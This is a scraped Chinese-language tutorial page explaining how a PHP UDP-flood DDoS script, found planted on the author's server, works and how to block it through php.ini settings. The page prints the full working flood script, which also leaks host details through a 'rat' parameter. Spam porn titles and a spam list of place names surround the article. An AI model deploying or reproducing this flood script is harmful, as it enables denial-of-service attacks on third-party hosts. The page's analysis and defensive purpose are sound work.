国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php的ddos攻擊解決方法

2024-05-04 23:29:58
字體:
來源:轉載
供稿:網友
這篇文章主要介紹了php的ddos攻擊解決方法,實例分析了ddos攻擊程序的原理與針對性的解決方法,是非常實用的技巧,需要的朋友可以參考下
 

本文實例講述了php的ddos攻擊解決方法。分享給大家供大家參考。具體分析如下:

今天自己的一臺機器突然向外部發送大量數據包,可每秒到1G以上,雖然我用策略把UDP禁止包是發不出去但是很占cup啊,所以想到最后還是想辦法解決了.

先看源碼,代碼如下:

復制代碼代碼如下:
<?php 
set_time_limit(999999); 
$host = $_GET['host']; 
$port = $_GET['port']; 
$exec_time = $_GET['time']; 
$Sendlen = 65535; 
$packets = 0; 
ignore_user_abort(True); 
 
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
        if (StrLen($_GET['rat'])<>0){ 
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 
                exit; 
            } 
        echo "Parameters can not be empty!"; 
        exit; 
    } 
 
for($i=0;$i<$Sendlen;$i++){ 
        $out .= "A"; 
    } 
 
$max_time = time()+$exec_time; 
 
while(1){ 
    $packets++; 
    if(time() > $max_time){ 
        break; 
    } 
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); 
        if($fp){ 
            fwrite($fp, $out); 
            fclose($fp); 
    } 

 
echo "Send Host:$host:$port<br><br>"; 
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; 
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; 
?>

關鍵代碼在于如下:
復制代碼代碼如下:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

 

方法很簡單,向目標主機發送UDP包,在加上定義無限死循環,就會形成較大的壓力.

這個壓力是對于執行這個腳本的服務器來說的,因為它首先對自身的網寬、CPU等資源造成大量占用,如果想用這個腳本對目標站點形成壓力,需要在多個服務器上執行該腳本,DDOS嘛,既然是用fsockopen請求外部,那就不讓他請求.

php.ini里設置,代碼如下:

復制代碼代碼如下:
allow_url_fopen = Off

 

如果這樣他還是能發包,代碼如下:

extension=php_sockets.dll

改成

;extension=php_sockets.dll

重啟APACHE、IIS、NGINX,這樣就可以防止PHP DDOS發包了.

另外有網友說,讓腳本不允許設置為不超時很簡單:

1. 把set_time_limit函數禁用

2. 啟用PHP的安全模式(safe_mode=on).

禁用socket函數可以把把socket模塊直接全部禁用也可以禁用fsockopen函數,建議,由于socket常用于發送郵件找回密碼,因此建議開啟直接開啟安全模式,但是這樣的話,腳本每30秒超時一次,估計沒有哪個“黑客”寂寞到每30秒去點一下開始DDOS.

經驗:這種問題一般是網站安全引起的,我們要注意網站的安全及服務器的安全,這樣就不容易被入侵了,如果會用macofee的朋友,對網站進行限制一下就會更好一些.

希望本文所述對大家的php程序設計有所幫助。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 大厂| 邢台县| 大丰市| 百色市| 新龙县| 财经| 吴川市| 阜康市| 万宁市| 桐梓县| 乌鲁木齐县| 邹城市| 岳西县| 昌图县| 锡林浩特市| 方山县| 屏边| 荔浦县| 云霄县| 长子县| 天柱县| 黄浦区| 巴楚县| 泊头市| 东阳市| 桑植县| 米泉市| 塘沽区| 金华市| 肥城市| 吴川市| 临桂县| 墨竹工卡县| 太谷县| 攀枝花市| 浠水县| 策勒县| 丰宁| 繁峙县| 滦平县| 陈巴尔虎旗|